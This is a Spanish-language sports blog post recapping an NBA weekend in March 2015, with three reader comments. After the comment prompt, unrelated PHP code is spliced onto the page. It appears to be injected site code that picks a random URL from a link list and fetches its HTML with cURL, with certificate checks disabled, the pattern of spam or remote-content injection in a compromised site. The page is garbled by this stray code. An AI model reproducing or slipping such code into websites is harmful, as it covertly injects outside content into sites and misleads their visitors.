Informe Fin de Semana: Cae KD, resiste OKC

30 de March de 2015 por TheDeerHunter

Se confirmó el secreto a voces de que la temporada termina definitivamente para Durant. No obstante la competición mantiene su intensidad a pesar de la ausencia de otra de sus principales estrellas.

El viernes los Warriors confirmaron que ahora mismo existe una gran distancia entre ellos y el resto de contendientes. En esta ocasión les tocó sufrirlos a los Grizzlies, quienes empiezan a ver peligrar el 2º puesto de la conferencia. Curry volvió a estar descomunal y su equipo iguala su récord histórico de victorias que, con toda seguridad, van a destrozar. Este récord, por cierto, estaba en manos de los Warriors liderados por Rick Barry que habían logrado el último anillo de la franquicia una campaña antes.

De los perseguidores en la Oeste, Harden “sólo” anotó 33 (con 8 asistencias) en la victoria sobre los Wolves; los Blazers doblegaron, no sin dificultad a los Suns; los Clippers destrozaron a los Sixers y los Spurs dejaron en 74 a los Mavs, con Diaw cogiendo el tono de Playoffs; los Pelicans, por su parte, se agarran al clavo ardiendo con su victoria a la desesperada ante los Kings de un inmenso Cousins.

En el Este, los Hawks se aseguraron la ventaja campo hasta al menos las Finales con su victoria ante Miami. Los Cavs fueron doblegados en Brooklyn y los Raptors se aseguraron postemporada con su fácil victoria ante Lakers. Vimos partidazos de Wall ante Hornets y de Reggie Jackson, con triple doble, ante Orlando. Los Celtics defendieron la 8ª plaza en el Madison.

El sábado, los Warriors se aseguraban el primer puesto en la regular y el récord de victorias ante los Bucks. Los Knicks también batían récord histórico, en este caso negativo, con su 60ª derrota infligida por los Bulls. Los Hawks, en modo rotación total, perdían ante Hornets y los Blazers ganaban a Nuggets de la mano de Aldridge, MVP de la jornada. La sorpresa la daban los Jazz, derrotando a los Thunder, seguramente extramotivados por las peyorativas declaraciones de su excompañero Kanter.

El fin de semana se cerró con victorias esenciales de Thunder, Heat y Nets de cara a cimentar sus respectivas presencias en Playoffs. OKC remontó 20 puntos en Phoenix y prácticamente acabó con las esperanzas de los Suns, que encajan tres derrotas seguidas y caen a 4 partidos de la ansiada octava posición. No se descuelgan los Pelicans, que anoche arrasaron a los Wolves y están a 2,5 partidos de los Thunder. En el Este, el resurgir de los Nets -de la mano siempre de un gran Brook Lopez- ya les ha alzado a puestos de Playoffs tras superar anoche a unos combativos Lakers. En Miami, los Pistons vieron frenada su racha y se despiden de sus pocas posibilidades de Playoffs ante uno de las mejores actuaciones recientes de Dwyane Wade. Resisten los Pacers gracias a su victoria de anoche ante los Mavericks, que han perdido a Monta Ellis y pueden encontrarse con una primera ronda ante los Warriors. Además de Dallas, otro equipo de la zona alta del Oeste anda en una racha preocupante: los Grizzlies. Cayeron claramente de nuevo, esta vez frente a unos Spurs a los que ya no hay que descartar incluso para el segundo puesto de la conferencia. Éste, debido a las tres derrotas seguidas de los Grizzlies, queda en manos de los Rockets después de que los texanos vencieran anoche a Wizards. Por último, los Cavaliers sufrieron las bajas de Love y Shumpert y a punto estuvieron de caer derrotados en su pista ante los Sixers.

Comenta

3 comentarios a esta entrada

  1. luismi_vallecas dice:
    #1

    Que bonitos pintan los PO este año, con los Warriors arrasando y jugando bien, al igual que Atlanta, otros como Cavs, Spurs, Clippers cogiendo cada vez mejores rachas de juego y resultados y más que no se pueden descartar nunca como Blazers, Rockets, Bulls… I love this game!!

      Citar

  2. Azabel dice:
    #2

    todo parece indicar que habra duelo heat/lebron en primera ronda,

      Citar

  3. Ruxixón dice:
    #3

    Los Lakers ganando a Philadelphia en la prórroga,y ya sólo hay dos victorias de diferencia con Orlando.Probablemente se merezcan más que otros el pick 1 (Lakers digo) porque con lo que tienen están compitiendo (Timberwolves y Knicks reyes del tankeo este año),pero ahora mismo las posibilidades de salirse del TOP 5 que les dejaría sin ronda dependen bastante de como queden en la clasificación respecto a Magic (y del sorteo claro está).Con esto los 76ers dando palmas con las orejas como se vean con 2 picks entre los 6 primeros.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>